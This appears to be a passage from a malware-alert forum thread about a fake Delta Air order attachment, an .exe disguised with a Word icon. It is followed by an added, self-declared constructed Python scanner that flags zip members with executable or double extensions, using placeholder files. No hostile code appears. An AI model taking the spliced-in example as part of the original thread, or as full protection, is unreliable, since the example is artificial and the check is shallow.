Current Virus total detections: 4/55* . This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper Microsoft word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1412075964/
 



Edited by AplusWebMaster, Today, 07:47 AM.

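Both posts above keep running into the same thing: a .scr or .exe inside a zip that is given a document, wav or invoice icon so it passes for a data file once Windows hides known extensions. As an added example (not code from the quoted blogs or from this thread), here is a small Python scanner that flags archive members whose final extension Windows will execute, and separately calls out the double-extension variant; the sample archive is constructed in memory from the attachment names quoted in the thread plus one made-up double-extension name.

```python
"""Flag zip members that Windows would execute, however they are dressed up.
Added example; the sample archive below is constructed, not a real capture."""
import io
import pathlib
import zipfile

# Extensions Windows runs on double-click. .scr (screensaver) is the one the
# quoted posts see most often because it still shows a spoofed icon.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                   ".vbs", ".js", ".jse", ".wsf", ".hta", ".cpl"}
# Harmless-looking extensions sometimes put in front of the real one.
DECOY_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".wav", ".mp3",
              ".jpg", ".png", ".txt", ".htm", ".html"}


def classify_member(name):
    """Return a reason string if the member looks dangerous, else None."""
    suffixes = [s.lower() for s in pathlib.PurePosixPath(name).suffixes]
    if not suffixes or suffixes[-1] not in EXECUTABLE_EXTS:
        return None
    # With "hide known extensions" on, a.wav.scr displays as a.wav; the
    # single-extension case is still flagged because the icon itself is spoofed.
    if len(suffixes) >= 2 and suffixes[-2] in DECOY_EXTS:
        return "double extension: %s disguised as %s" % (suffixes[-1], suffixes[-2])
    return "executable attachment: %s" % suffixes[-1]


def scan_zip_bytes(data):
    """Scan a zip held in memory; returns [(member_name, reason), ...]."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reason = classify_member(info.filename)
            if reason:
                flagged.append((info.filename, reason))
    return flagged


def build_sample_zip():
    """Constructed archive using attachment names quoted in this thread,
    plus one invented double-extension name (Order_confirmation.xls.scr)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("voice448705888444.scr", b"MZ placeholder, not malware")
        zf.writestr("DT-ET_5859799188.exe", b"MZ placeholder, not malware")
        zf.writestr("Order_confirmation.xls.scr", b"MZ placeholder, not malware")
        zf.writestr("readme.txt", b"benign text member")
    return buf.getvalue()
```

Point it at real mail-gateway quarantine by swapping `build_sample_zip()` for the bytes of an attachment; anything the scanner returns is worth a block regardless of how the file's icon looks.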




